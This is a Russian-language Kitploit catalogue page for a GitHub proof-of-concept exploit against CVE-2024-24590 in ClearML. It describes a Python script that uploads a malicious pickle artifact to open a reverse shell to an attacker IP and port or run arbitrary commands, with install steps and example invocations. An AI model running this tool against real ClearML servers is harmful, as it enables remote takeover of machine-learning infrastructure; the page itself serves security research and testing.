Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-24590-ClearML-RCE-CMD-POC — CVE-2024-24590 ClearML RCE&CMD POC | Kitploit
Инструменты/GitHubGitHub/diegogarciayala/cve-2024-24590-clearml-rce-cmd-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияКомандование и УправлениеБезопасность Цепочки ПоставокИнструмент Удаленного Доступа
GitHubdiegogarciayala/cve-2024-24590-clearml-rce-cmd-poc

CVE-2024-24590-ClearML-RCE-CMD-POC

CVE-2024-24590 ClearML RCE&CMD POC

Репозиторий
9132 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сценарий эксплуатации ClearML

Этот репозиторий содержит сценарий эксплуатации на Python для CVE-2024-24590. Сценарий предназначен для загрузки вредоносного pickle-файла в ClearML, который выполняет обратную оболочку или произвольную команду.

Возможности

  • Загружает вредоносный pickle-артефакт в ClearML.
  • Выполняет обратную оболочку или произвольную команду на целевой машине.
  • Поддерживает пользовательские имена проектов и задач.
  • Позволяет установить тег на задачу.

Использование

Предварительные требования

  • Python 3.x
  • ClearML SDK
  • argparse (обычно входит в состав Python)

Установка

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    
  2. Установите ClearML SDK:

    root@kitploit:~
    pip install clearml
    clearml-init
    

Запуск сценария

Сценарий поддерживает два режима работы: default и cmd.

Режим по умолчанию

В этом режиме вы должны указать IP-адрес и порт атакующего для установки обратной оболочки.

root@kitploit:~
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>

Режим CMD

В этом режиме вы можете указать произвольную команду для выполнения.

root@kitploit:~
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"

Примеры

root@kitploit:~
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
root@kitploit:~
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"

whoami

  • HackTheBox: sl4sh1t0
  • Telegram: sl4sh1t0
  • X (Twitter): @diegogarciayala

Благодарности

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

Скачать инструмент